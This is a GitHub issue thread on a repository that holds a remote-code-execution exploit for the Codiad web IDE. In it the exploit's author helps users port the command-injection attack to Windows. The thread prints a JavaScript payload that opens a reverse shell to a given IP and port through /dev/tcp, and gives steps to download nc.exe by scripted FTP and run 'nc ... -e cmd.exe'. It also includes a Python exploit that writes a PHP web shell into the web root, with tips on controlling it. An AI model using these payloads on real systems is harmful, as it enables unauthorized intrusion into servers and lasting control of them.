Codiad-Remote-Code-Execute-Exploit
Codiad-Remote-Code-Execute-Exploit copied to clipboard
error on class.filemanager.php line 208
Hey man - Im coming up against this issue at the moment, any ideas
<b>Notice</b>: Undefined index: type in <b>C:\xampp\htdocs\development\components\filemanager\class.filemanager.php</b> on line <b>208</b><br />
Hi, guy actually, I haven't tested this payload on any windows server, it works on Linux. but now I am a little busy, so I will tell you how to find the reason for this error. if you have learned PHP language, you will be able to debug this error. for solving this problem, you should use debug functions of PHP language, such as print_r, var_dump... and see how this error occurred. thank you.
i got the same error that REPTILEHAUS gets.
@ozgur2357 okay, I got it, I will review it right now, thank you for reporting
@ozgur2357 Could you offer me some information about your operation system version or php version or codiad version, that will do a lot help for solving this problem. thank you, bro
@WangYihang of course, Windows 7 Professional Edition Service Pack 1, php version 5.6.12 with xampp
look, I just change the source code of file: ROOT/components/filenmanager/class.filemanager.php#line244
then use the exploit.js to exploit it, and the browser reported that:
<br />
<b>Notice</b>: Undefined index: type in <b>C:\phpStudy\PHPTutorial\WWW\components\filemanager\class.filemanager.php</b> on line <b>238</b><br />
but the evil code actually has been executed.
My environment is:
php 5.4.45
windows 10
codiad 2.8.3
I got the reason, I have not add the GET arg type
in the URL
but this arg does not effect us to get a reverse shell
you can see the evil command actually been executed
The main reason that you didn't get a reverse shell is that the evil code is write for linux(cause windows does not have bash
)
This exploition is based on a tech which named command injection
but it didn't work for windows OS sometimes.
maybe we can search with such keywords command injection on windows
on web
Look, I got some way to inject command on windows platform just like this:
C:\phpStudy\PHPTutorial\WWW>find -L .\ -iregex "*" & dir & echo "*"
找不到文件 - -L
找不到文件 - .\
找不到文件 - -IREGEX
驱动器 C 中的卷没有标签。
卷的序列号是 CE19-C138
C:\phpStudy\PHPTutorial\WWW 的目录
2017/12/23 23:41 <DIR> .
2017/12/23 23:41 <DIR> ..
2017/07/26 01:53 567 .editorconfig
2017/07/26 01:53 173 .gitignore
the old exploition is designed for linux
because we are able to injection command with \n
on linux platform
ip="8.8.8.8";
port="8888";
$.get(
"/components/project/controller.php?action=get_current",
function(d){
p=JSON.parse(d)['data']['path'];
$.post(
"/components/filemanager/controller.php?action=search&path="+p,
{"search_file_type":"\"\n/bin/bash -c 'sh -i >&/dev/tcp/"+ip+"/"+port+" 0>&1'\ngrep \"",}
);
}
);
so, we just need to change the exploit to make it fit on windows
ip="8.8.8.8";
port="8888";
command="dir";
$.get(
"/components/project/controller.php?action=get_current",
function(d){
p=JSON.parse(d)['data']['path'];
$.post(
"/components/filemanager/controller.php?action=search&path="+p,
{"search_file_type":'*"&'+command+'&echo "'}
);
}
);
Unfortunately we can not get the output of this command dir
how can we prove it?
using ping, just give it a try
so I change the var command
to command="ping SERVER_IP";
then use tcpdump to listen on the server SERVER_IP
got it, now we are able to execute any command on windows platform, cool
That's so cool, let's try to find someway to get a reverse shell on window, cause windows platform does not bash, so we can not use the bash build-in function to build a revershell maybe we can use python or other binaries, or we can use powershell to generate a revershell
Hi WangYihang, yes i managed to ping the way you said, cool thanks, now i think how to get a shell now like you.
how about upload nc.exe for windows via ftp? but ftp is an interactive app.
Of course you can use nc.exe or some other binary virus You can learn how to download file with windows cmd.exe from the following url
https://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line
To download a binary from a ftp server by php function shell_exec
we just need to let it type the following words
ftp 192.168.1.143
admin
admin
get nc.exe
quit
then the file will be stored at the current directory so now, we are able to get a reverse shell while using it
nc 8.8.8.8 8888 -e cmd.exe
to make it possible, cause the ftp server is an interactive app, so we should put all the commands into a temp file just like this:
admin
admin
get nc.exe
quit
how to use it, yeah, using the input stream redirection.
ftp 127.0.0.1 < command.txt
how to create the file: command.txt
just use
C:\Users\Sun\Desktop\test>echo firstline > command.txt
C:\Users\Sun\Desktop\test>echo secondline >> command.txt
C:\Users\Sun\Desktop\test>type command.txt
firstline
secondline
so, that's the solution. thank you. @ozgur2357 @REPTILEHAUS
hi Wang, so we should be able to update the code and use it for windows right? can you update your code for windows 7?
Okay, I will try it these days in many ways. On Mon, Jan 15, 2018 at 7:25 AM totoroha [email protected] wrote:
hi Wang, so we should be able to update the code and use it for windows right? can you update your code for windows 7?
— You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-357551771, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhAWpsOpt_xY212z942DOxLpL7vASks5tKozxgaJpZM4Q0Cen .
Hello Wang , I am really interested into this as well , do you think you will be able to rework the code anytime soon ? Any chance to have a python exploit windows based ? Many thanks !
@kienast I will try, but actually, a lot of windows server will not have python installed... so maybe we should use some cmd build-in command... to make the exploitation more robust.
No problem , just let us if someone can test this so we can have a sort of step by step guide for a windows machine , that would be awesome ! thanks
@ozgur2357 @kienast @totoroha @REPTILEHAUS Hey, guys, the Windows platform which installed Codiad (<2.8.4) now is available to be exploited. thanks for @mhaskar 's excellent work. (Python version and the JavaScript version is under development.)
@WangYihang , Thanks again man , best of luck and we will keep in touch !
Hi @mhaskar @WangYihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}
My environment is Windows running CODIAD. Can you please help ?
Have edited the code as below - def exploit(domain, username, password, ip, port, path): global session url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path) #payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ''' # This is the full payload for windows which escape the command string and execute the command calc.exe # You can replace calc.exe with any command , for example you can use the following command to upload php cmd shell with cmd parameter payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""''' windows_payload = 'Hacker"%26cmd.exe echo""' data = "search_string=Hacker&search_file_type=" + windows_payload headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=data, headers=headers) content = response.content if content == '''{"status":"error","message":"No Results Returned"}''': print "[-] If you see this message immediately, three reasons:" print "\t[+] 1. You just have exited the reverse shell." print "\t[+] 2. The target server cannot access your vps server." print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."
Got it, I will check it tonight, and thank you for your reporting anishmi123 [email protected]于2018年3月12日 周一下午1:59写道:
Hi @mhaskar https://github.com/mhaskar @WangYihang https://github.com/wangyihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}
My environment is Windows running CODIAD. Can you please help ?
Have edited the code as below - def exploit(domain, username, password, ip, port, path): global session url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path) #payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ'''
This is the full payload for windows which escape the command string and
execute the command calc.exe
You can replace calc.exe with any command , for example you can use the
following command to upload php cmd shell with cmd parameter payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""''' windows_payload = 'Hacker"%26cmd.exe echo""' data = "search_string=Hacker&search_file_type=" + windows_payload headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=data, headers=headers) content = response.content if content == '''{"status":"error","message":"No Results Returned"}''': print "[-] If you see this message immediately, three reasons:" print "\t[+] 1. You just have exited the reverse shell." print "\t[+] 2. The target server cannot access your vps server." print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."
— You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-372201516, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhH3M3ETpaxFMpHoQfOtG31kTe2w6ks5tdg6vgaJpZM4Q0Cen .
Here are some steps may be helpful for you:
- Check whether the target file (C:/xampp/htdocs/z2.php) exists, if yes, then check the content, if the web shell is written into it, you succeed! You can use some web shell connect tool to manage the server, such as (antSword/中国菜刀)
- Check whether the target folder (C:/xampp/htdocs/ ) exists, if not, please replace it to the correct folder which is writable and accessible on web
- If you are able to read/write php code, please locate the file: https://github.com/Codiad/Codiad/blob/master/components/filemanager/class.filemanager.php#L243 Then change the shell_exec function to var_dump/print_r/echo or some print function else Then execute the exploit script again, you can just receive the command to execute, I think you can just put the command in your terminal (cmd), you will figure out the reason (PS: the step 3 is a very important method in debugging or discovering the vulnerabilities. Also you can use other IDE with php debuggers, such as PHPStorm/Eclipse...)
If you have already following the three steps and still not find the reason, please inform me. Finally, thank you for you report and keep in touch
Best
王一航 [email protected]于2018年3月13日 周二上午9:45写道:
Got it, I will check it tonight, and thank you for your reporting anishmi123 [email protected]于2018年3月12日 周一下午1:59写道:
Hi @mhaskar https://github.com/mhaskar @WangYihang https://github.com/wangyihang I am still getting an error saying Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}
My environment is Windows running CODIAD. Can you please help ?
Have edited the code as below - def exploit(domain, username, password, ip, port, path): global session url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path) #payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ'''
This is the full payload for windows which escape the command string
and execute the command calc.exe
You can replace calc.exe with any command , for example you can use the
following command to upload php cmd shell with cmd parameter payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""''' windows_payload = 'Hacker"%26cmd.exe echo""' data = "search_string=Hacker&search_file_type=" + windows_payload headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} response = session.post(url, data=data, headers=headers) content = response.content if content == '''{"status":"error","message":"No Results Returned"}''': print "[-] If you see this message immediately, three reasons:" print "\t[+] 1. You just have exited the reverse shell." print "\t[+] 2. The target server cannot access your vps server." print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."
— You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-372201516, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhH3M3ETpaxFMpHoQfOtG31kTe2w6ks5tdg6vgaJpZM4Q0Cen .